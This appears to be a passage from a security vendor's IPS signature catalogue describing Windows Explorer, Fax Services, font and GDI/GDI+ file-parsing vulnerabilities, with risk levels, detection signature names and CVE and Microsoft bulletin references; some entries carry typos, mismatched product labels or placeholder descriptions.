Resource Starvation

Description:

Microsoft Windows Explorer has a stack exhaustion vulnerability in the handling of crafted URL files. The vulnerability can be exploited by persuading a user to open a specially crafted URL file or to place the file on the user's desktop. Opening the file leads to a termination of Windows Explorer. If a malicious file is placed on the target user's desktop, the vulnerable application will keep reading the file decreasing the usability of the Windows operating system.

Situation:

HTTP_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
E-Mail_BS-Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
File-TextId_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow

References:

CVE-2006-3351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3351

BID-18838
http://www.securityfocus.com/bid/18838

Microsoft-Windows-Explorer-Web-View-Script-Execution

About this vulnerability:

Script execution vulnerability in Microsoft Windows Explorer Web View

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 98; Windows 98 SE; Windows ME; Windows 2000 SP3; Windows 2000 SP4

Software:

<os>

Type:

Malfunction

Description:

Microsoft Windows Explorer Web View component has a vulnerability in parsing the Author field in file summary information. If a user views a malicious file using the Windows Explorer Web View component, an attacker is able to execute arbitrary script code on the victim machine.

Situation:

HTTP_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
E-Mail_BS-Suspicious-Author-Field-In-Microsoft-OLE-Compound-File
File-OLE_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File

References:

CVE-2005-1191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1191

BID-13248
http://www.securityfocus.com/bid/13248

MS05-024
http://technet.microsoft.com/security/bulletin/MS05-024

Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A double free memory corruption vulnerability exists in Microsoft Windows Fax Services. Tto improper handling of Text objects while parsing Microsoft Fax cover page files. Remote this vulnerability by enticing the target user to open a specially crafted Fax cover page file.

Situation:

HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption
File-Binary_Microsoft-Windows-Fax-Services-Cover-Editor-Memory-Corruption

References:

CVE-2010-4701
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4701

BID-45942
http://www.securityfocus.com/bid/45942

MS11-024
http://technet.microsoft.com/security/bulletin/MS11-024

Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Fax Services

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows XP; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Microsoft Windows Fax Services. The vulnerability is due to insufficient validation of drawing object data while parsing Microsoft Fax cover page files. Remote attackers could exploit this vulnerability by enticing the target user to open a specially crafted fax cover page file. Successful exploitation could result in execution of arbitrary code in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Windows-Fax-Services-Cover-Page-Editor-Heap-Buffer-Overflow
File-Binary_Microsoft-Windows-Fax-Services-Cover-Page-Heap-Buffer-Overflow

References:

CVE-2010-3974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3974

MS11-024
http://technet.microsoft.com/security/bulletin/MS11-024

Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability

About this vulnerability:	A vulnerability in Microsoft Windows
Risk:	Moderate
First detected in:	sgpkg-ips-1782-5242
Last changed:	sgpkg-ips-1782-5242
Platform:	Windows
Software:	<os>
Type:	Input Validation
Description:	An information disclosure vulnerability has been reported in Microsoft Windows due to improper input validation when handling File Explorer Command (.scf) files. A remote attacker could exploit this vulnerability by enticing a victim into downloading a maliciously crafted file. A successful exploit could result in the disclosure of a targeted user's NTLM hashes.
Situation:	File-Text_Microsoft-Windows-File-Explorer-Command-File-NTLM-Relay-Vulnerability

Microsoft-Windows-File-Handling-Component-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-576-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability has been reported in Microsoft Windows. The vulnerability is caused by Windows improperly restricting the path used for processing .bat and .cmd files. By placing .bat or .cmd files on a trusted or semi-trusted network location with a malicious cmd.exe, and convincing the user to run these crafted files from the network location, an attacker can run arbitrary code as the logged-on user.

Situation:

HTTP_CSH-System-File-Over-WebDAV
SMB-TCP_CHS-Microsoft-Windows-File-Handling-Component-Remote-Code-Execution

References:

CVE-2014-0315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0315

BID-66619
http://www.securityfocus.com/bid/66619

OSVDB-105534
http://www.osvdb.org/105534

MS14-019
http://technet.microsoft.com/security/bulletin/MS14-019

Microsoft-Windows-Font-Library-File-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows. The vulnerability is due to an input validation error when the kernel parses a .FON font file. Attackers can exploit this vulnerability by enticing a user to open a malformed .fon font file. Successful exploitation of this vulnerability would result in the execution of arbitrary code within the security privileges of the Windows kernel.

Situation:

File-Exe_Microsoft-Windows-Font-Library-File-Buffer-Overflow

References:

CVE-2011-2003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2003

MS11-077
http://technet.microsoft.com/security/bulletin/MS11-077

Microsoft-Windows-Font-Library-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1068-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

An attempt to exploit a vulnerability in the font library of Microsoft Windows

Situation:

File-Binary_Microsoft-Windows-Font-Library-Remote-Code-Execution

References:

CVE-2018-1013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1013

Microsoft-Windows-Font-Parsing-CVE-2012-2897

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 8; Windows 2012; Windows RT

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-Font-Parsing-CVE-2012-2897

References:

CVE-2012-2897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2897

BID-56457
http://www.securityfocus.com/bid/56457

OSVDB-85749
http://www.osvdb.org/85749

MS12-075
http://technet.microsoft.com/security/bulletin/MS12-075

Microsoft-Windows-GDI-Access-Violation-CVE-2011-5046

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows 2008; Windows Vista; Windows 7

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

References:

CVE-2011-5046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5046

OSVDB-77908
http://www.osvdb.org/77908

MS12-008
http://technet.microsoft.com/security/bulletin/MS12-008

Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow

About this vulnerability:

EMF file format handling vulnerability in Microsoft Windows kernel

Risk:

High

First detected in:

sgpkg-ips-247-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The Microsoft Windows GDI subsystem has a vulnerability in the handling of EMF and WMF images. A specially crafted image can cause memory corruption in a kernel component, allowing remote attackers to execute arbitrary code on vulnerable hosts.

Situation:

E-Mail_BS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
HTTP_SS-Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow
File-Binary_Microsoft-Windows-GDI-EMF-Polyline-Buffer-Overflow

References:

CVE-2009-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0081

BID-34012
http://www.securityfocus.com/bid/34012

OSVDB-52522
http://www.osvdb.org/52522

MS09-006
http://technet.microsoft.com/security/bulletin/MS09-006

Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper handling of EMF files causes an information disclosure vulnerability in Windows. A successful exploit allows an attacker to gain access to information on the target system.

Situation:

File-Binary_Microsoft-Windows-GDI-EMR_setpixelv-Handling-Information-Disclosure

References:

CVE-2022-34728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34728

Microsoft-Windows-GDI-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows GDI

Risk:

Moderate

First detected in:

sgpkg-ips-1142-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Graphics Device Interface

Type:

Malfunction

Description:

A vulnerability in the Graphics Device Interface of Microsoft Windows, multiple versions, which allows remote attackers to gain sensitive information due to an improper disclosure of the contents of the memory.

Situation:

File-Binary_Microsoft-Windows-GDI-Information-Disclosure

References:

CVE-2018-8596
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8596

Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Microsoft Graphics Device Interface (GDI) library. The flaw is due to a calculation error while handling EMF or WMF image files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted EMF or WMF image file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow
File-Binary_Microsoft-Windows-GDI-Metafile-Image-Handling-Heap-Overflow-2

References:

CVE-2008-1083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1083

BID-28571
http://www.securityfocus.com/bid/28571

OSVDB-44214
http://www.osvdb.org/44214

OSVDB-44213
http://www.osvdb.org/44213

MS08-021
http://technet.microsoft.com/security/bulletin/MS08-021

Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Microsoft Graphics Device Interface (GDI) library. The flaw is due to an integer overflow while handling WMF image files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted WMF image file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged on user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-Binary_Microsoft-Windows-GDI-WMF-File-Headersize-Buffer-Overflow

References:

CVE-2008-2249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2249

BID-32634
http://www.securityfocus.com/bid/32634

MS08-071
http://technet.microsoft.com/security/bulletin/MS08-071

Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-407-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists Microsoft Windows Graphics Device Interface (GDI+). The vulnerability is due to an error in integer calculations when handling EMF files, which can cause memory corruption. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open or view (potentially via a web page) a specially crafted EMF file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Binary_Microsoft-Windows-Gdiplus-EMF-Handling-Integer-Overflow

References:

CVE-2011-0041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0041

MS11-029
http://technet.microsoft.com/security/bulletin/MS11-029

Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

A vulnerability has been reported in Microsoft Windows Graphics Device Interface.

Situation:

HTTP_SS-Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-Gpfont.setdata-Integer-Overflow

References:

CVE-2009-1217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1217

BID-34250
http://www.securityfocus.com/bid/34250

Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Expression Web

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Microsoft Windows GDI+ that could allow remote code execution.

Situation:

HTTP_SS-Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow
File-PNG_Microsoft-Windows-Gdiplus-PNG-Processing-Integer-Overflow

References:

CVE-2009-3126
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3126

BID-36649
http://www.securityfocus.com/bid/36649

MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062

Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Expression Web

Risk:

Moderate

First detected in:

sgpkg-ips-407-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer; Microsoft Office

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Windows GDI+ that could allow remote code execution. The vulnerability is due to the way that Microsoft Windows GDI allocates memory. A remote attacker can exploit this vulnerability by enticing the target to open a specially crafted TIFF file. In the case of successful code injection and execution, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be executed with the privileges of the currently user. In the case where code execution is not successful, the application may terminate abnormally.

Situation:

HTTP_SS_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
File-Binary_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow

References:

CVE-2009-2502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2502

BID-36646
http://www.securityfocus.com/bid/36646

MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062

Microsoft-Windows-Gdiplus-WMF-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Microsoft Windows GDI+ library. The vulnerability is due to an input validation error in Microsoft Windows while processing a crafted WMF image file. Remote attackers could exploit this vulnerability by persuading a target user to open a specially crafted WMF image file in the vulnerable products. Successful exploitation would cause a heap buffer overflow that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a Denial of Service condition.

Situation:

File-Binary_Microsoft-Windows-Gdiplus-WMF-Integer-Overflow

References:

CVE-2009-2500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2500

BID-36619
http://www.securityfocus.com/bid/36619

MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062

Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1594-5242

Last changed:

sgpkg-ips-1594-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An out of bounds read in the Graphics Component when handling EMF files causes a vulnerability in Windows. A successful exploit allows an attacker to access information on the target system.

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-Createcolorspace-EMF-Out-Of-Bounds-Read

References:

CVE-2022-37985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37985

Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-797-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in Microsoft Windows

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3301-Code-Execution

References:

CVE-2016-3301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3301

MS16-097
http://technet.microsoft.com/security/bulletin/MS16-097

Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Windows detected

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3303-Code-Execution

References:

CVE-2016-3303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3303

MS16-097
http://technet.microsoft.com/security/bulletin/MS16-097

Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-793-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in Microsoft Windows

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2016-3304-Code-Execution

References:

CVE-2016-3304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3304

MS16-097
http://technet.microsoft.com/security/bulletin/MS16-097

Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported a vulnerability in the GDI component of Microsoft Windows. A remote attacker could exploit this by having a victim to open maliciously crafted web page. Successful exploitation could allow the attacker to gain sensitive information that may help in further attacks.

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-CVE-2017-11816-Information-Disclosure

References:

CVE-2017-11816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11816

Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1777-5242

Last changed:

sgpkg-ips-1777-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in the GDI component of Microsoft Windows. The vulnerability is due to an improper disclosure of the contents of the memory. A remote attacker can exploit this vulnerability by enticing a victim to open a maliciously crafted web page or document. Successful exploitation would allow the attacker to gain sensitive information that may help in further attacks.

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-Information-Disclosure-CVE-2018-8239

References:

CVE-2018-8239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8239

Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-Meta_Setdibtodev-Information-Disclosure

References:

CVE-2017-0190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190

Microsoft-Windows-Graphics-Component-Remote-Code-Execution

About this vulnerability:

A Microsoft Windows Graphics Component Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-836-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Graphics Rendering Engine

Type:

Input Validation

Description:

A vulnerability in Microsoft Windows Graphic Component which allows remote attackers to execute arbitrary code.

Situation:

File-Binary_Microsoft-Windows-Graphics-Component-Remote-Code-Execution

References:

CVE-2016-7272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7272

Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 8; Windows 2012; Windows RT

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability exists in the way Windows processes embedded bitmap images. A specially crafted file, with invalid values inserted into the bitmap info header, could cause a buffer overflow and possibly remote code execution.

Situation:

File-OLE_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
File-Binary_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability

References:

CVE-2013-3940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3940

OSVDB-99646
http://www.osvdb.org/99646

MS13-089
http://technet.microsoft.com/security/bulletin/MS13-089

Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1130-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported an information disclosure vulnerability in the Graphics Device Interface (GDI) component of Microsoft Windows. This vulnerability could be exploited by a remote attacker and it could lead in disclosure of information.

Situation:

File-Binary_Microsoft-Windows-Graphics-Device-Interface-EMR_Header-Information-Disclosure

References:

CVE-2018-8595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8595

Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows detected

Situation:

File-Binary_Microsoft-Windows-Graphics-Device-Interface-Information-Disclosure

References:

CVE-2018-8424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8424

Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

Improper handling of EMF files can result in an attacker gaining code execution privileges on the target system.

Situation:

File-Binary_Microsoft-Windows-Graphics-Device-Interface-Integer-Overflow

References:

CVE-2016-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0170

MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055

Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper validation of EMF file structures causes a vulnerability in Windows. A successful exploit will allow an attacker to leak information from the system.

Situation:

File-Binary_Microsoft-Windows-Graphics-Device-Interface-Out-Of-Bounds-Access

References:

CVE-2016-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0169

MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055

Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Digital Image Suite

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Client Security; Internet Explorer; Microsoft Office 2003; Microsoft Office XP; Microsoft PowerPoint Viewer; Microsoft Report Viewer; Microsoft SQL Server; Microsoft Visio; Microsoft Works

Type:

Malfunction

Description:

A remote code execution vulnerability exists in the way that GDI+ handles parsing of EMF image files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted EMF file image. Successful exploitation can result in memory corruption which may lead to arbitrary code execution under the credentials of the currently logged in user. In a successful attack case, the malicious code can be executed on the target host. The behaviour of the target depends upon the intention of the attacker. The code will be executed with the privileges of the logged in user. In case if the attack is not successful, the application using the affected library might be terminated due to memory corruption.

Situation:

File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-EMF-Parsing-Memory-Corruption

References:

CVE-2008-3012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3012

BID-31019
http://www.securityfocus.com/bid/31019

MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052

Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Digital Image Suite

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Client Security; Internet Explorer; Microsoft Office XP; Microsoft PowerPoint Viewer; Microsoft Report Viewer; Microsoft SQL Server; Microsoft Visio; Microsoft Works

Type:

Malfunction

Description:

A remote code execution vulnerability exists in the way that Microsoft Windows Graphics Rendering Engine parses GIF images. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted GIF file image. Successful exploitation can result in arbitrary code execution under the credentials of the currently logged in user. In a successful attack case, the malicious code can be injected and executed on the target host. The behaviour of the target depends upon the intention of the attacker, and the code will be executed with the privileges of the logged in user. In case if the attack is not successful, the application using the affected library will be terminated due to memory corruption. If the malicious file is opened in Explorer.exe, the process will be terminated, but automatically restarted by Windows.

Situation:

File-GIF_Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow

References:

CVE-2008-3013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3013

BID-31020
http://www.securityfocus.com/bid/31020

MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052

Microsoft-Windows-Graphics-Rendering-Engine-VML-BOF

About this vulnerability:

A vulnerability in Microsoft Windows Graphics Rendering Enigine

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP 64-bit; Windows XP 64-bit SP2; Windows Vista; Windows Vista SP1; Windows 2003 64-bit; Windows 2003 SP1; Windows 2003 SP2; Windows 2008

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability has been discovered in the Graphics Rendering Engine (GRE) component of Microsoft Windows. The vulnerability is due to the way that GDI+ handles gradient sizes. An attacker can exploit this vulnerability by enticing a user to browse a malicious Web site with specially crafted content. An attack can lead to denial of service, or in the injection and execution of arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize
File-Text_Microsoft-Windows-Graphics-Rendering-Engine-VML-Negative-Focussize

References:

CVE-2007-5348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5348

BID-31018
http://www.securityfocus.com/bid/31018

MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052

Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF

About this vulnerability:

A vulnerability in Microsoft Windows Graphics Rendering Enigine

Risk:

High

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP 64-bit; Windows XP 64-bit SP2; Windows Vista; Windows Vista SP1; Windows 2003 64-bit; Windows 2003 SP1; Windows 2003 SP2; Windows 2008

Software:

<os>

Type:

Buffer Overflow

Description:

There is a vulnerability in the Graphics Rendering Engine (GRE) component of Microsoft Windows. Specifically this vulnerability is exposed by the Microsoft Windows GDI+ subsystem. The vulnerability is created by an error during the parsing of certain Windows Metafile (WMF) files. An attacker can exploit this vulnerability by enticing a user to open a malicious WMF file, resulting in either a denial of service, or in the injection and execution of arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF
File-Binary_Microsoft-Windows-Graphics-Rendering-Engine-WMF-Polygon-Parsing-BOF

References:

CVE-2008-3014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3014

BID-31021
http://www.securityfocus.com/bid/31021

MS08-052
http://technet.microsoft.com/security/bulletin/MS08-052

Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

